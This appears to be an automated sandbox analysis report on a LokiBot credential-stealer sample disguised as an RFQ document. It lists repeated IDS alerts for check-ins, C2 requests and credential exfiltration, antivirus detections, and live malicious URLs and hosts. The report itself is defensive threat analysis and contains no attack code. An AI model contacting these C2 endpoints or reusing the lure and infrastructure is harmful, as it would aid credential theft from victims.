ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:54.423488
SID:	2024318
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:56.921190
SID:	2825766
Source Port:	49856
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:43.265047
SID:	2024313
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:48.477935
SID:	2825766
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:58.810149
SID:	2021641
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:09.042243
SID:	2024318
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:54.423488
SID:	2024313
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:49.163901
SID:	2025381
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:33.093731
SID:	2825766
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:36.850228
SID:	2021641
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:25.719182
SID:	2825766
Source Port:	49815
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:32.267354
SID:	2024318
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:47.687505
SID:	2021641
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:41.484457
SID:	2024313
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:43.957176
SID:	2825766
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:55.108965
SID:	2021641
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:52.638175
SID:	2825766
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:41.484457
SID:	2024318
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:42.314099
SID:	2825766
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:43.152524
SID:	2025381
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:53.324729
SID:	2025381
Source Port:	49851
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:34.610079
SID:	2825766
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:08.198877
SID:	2025381
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:05.938500
SID:	2025381
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:09.892413
SID:	2021641
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:56.921190
SID:	2021641
Source Port:	49856
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:48.477935
SID:	2021641
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:13.658001
SID:	2025381
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:32.914570
SID:	2825766
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:34.982502
SID:	2825766
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:55.796602
SID:	2025381
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:45.205065
SID:	2021641
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:54.842169
SID:	2021641
Source Port:	49853
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:45.335995
SID:	2825766
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:34.982502
SID:	2021641
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:06.650555
SID:	2024318
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:33.791207
SID:	2024318
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:45.205065
SID:	2825766
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:33.791207
SID:	2024313
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:56.609631
SID:	2024318
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:35.672062
SID:	2025381
Source Port:	49829
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:21.763703
SID:	2024313
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:06.650555
SID:	2024313
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:34.610079
SID:	2021641
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:54.009985
SID:	2024313
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:55.534565
SID:	2025381
Source Port:	49854
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:23.522239
SID:	2825766
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:45.335995
SID:	2021641
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:24.205256
SID:	2025381
Source Port:	49813
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:46.959263
SID:	2025381
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:54.009985
SID:	2024318
Source Port:	49852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:37:56.609631
SID:	2024313
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:07.360242
SID:	2021641
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:21.763703
SID:	2024318
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.4 - Destination IP: 104.21.13.124

Timestamp:	04/03/24-06:38:54.842169
SID:	2825766
Source Port:	49853
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: RFQ-SulselBarruII2-COALCOMMLDOC.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://ebnsina.top/project/five/fre.php	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\RFQ-SulselBarruII2-COALCOMMLDOC.exe

Avira: detection malicious, Label: HEUR/AGEN.1333748

Multi AV Scanner detection for domain / URL

Source: ebnsina.top	Virustotal: Detection: 19%			Perma Link
Source: http://ebnsina.top/project/five/fre.php	Virustotal: Detection: 17%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\RFQ-SulselBarruII2-COALCOMMLDOC.exe

Virustotal: Detection: 9%

Perma Link

Multi AV Scanner detection for submitted file

Source: RFQ-SulselBarruII2-COALCOMMLDOC.exe

Virustotal: Detection: 9%

Perma Link

Source: RFQ-SulselBarruII2-COALCOMMLDOC.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 192.178.50.78:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.178.50.65:443 -> 192.168.2.4:49739 version: TLS 1.2

Source: RFQ-SulselBarruII2-COALCOMMLDOC.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: ImagingDevices.pdb source: ImagingDevices.exe, ImagingDevices.exe, 00000013.00000002.2863962364.00000000002F1000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: ?\C:\Windows\System.Core.pdb source: powershell.exe, 00000001.00000002.1926714134.00000000084CA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb55 source: powershell.exe, 00000001.00000002.1919713702.0000000002CC3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ImagingDevices.pdbGCTL source: ImagingDevices.exe, 00000013.00000002.2863962364.00000000002F1000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.1923493560.00000000071C6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923493560.0000000007228000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.1926270100.0000000008410000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.1923493560.00000000071C6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000001.00000002.1923493560.00000000071C1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000001.00000002.1923493560.0000000007228000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Code function: 0_2_0040687E FindFirstFileW,FindClose,	0_2_0040687E
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910
Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe	Code function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C2D

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49740 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49740 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49740 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49740 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49740 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49741 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49741 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49741 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49741 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49741 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49742 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49742 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49742 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49742 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49742 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49743 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49743 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49743 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49743 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49743 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49744 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49744 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49744 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49744 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49744 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49745 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49745 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49745 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49745 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49745 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49746 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49746 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49746 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49746 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49746 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49747 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49747 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49747 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49747 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49747 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49748 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49748 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49748 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49748 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49748 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49749 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49749 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49749 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49749 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49749 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49750 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49750 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49750 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49750 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49750 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49751 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49751 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49751 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49751 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49751 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49752 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49752 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49752 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49752 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49752 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49753 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49753 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49753 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49753 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49753 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49754 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49754 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49754 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49754 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49754 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49755 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49755 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49755 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49755 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49755 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49756 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49756 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49756 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49756 -> 104.21.13.124:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.4:49756 -> 104.21.13.124:80
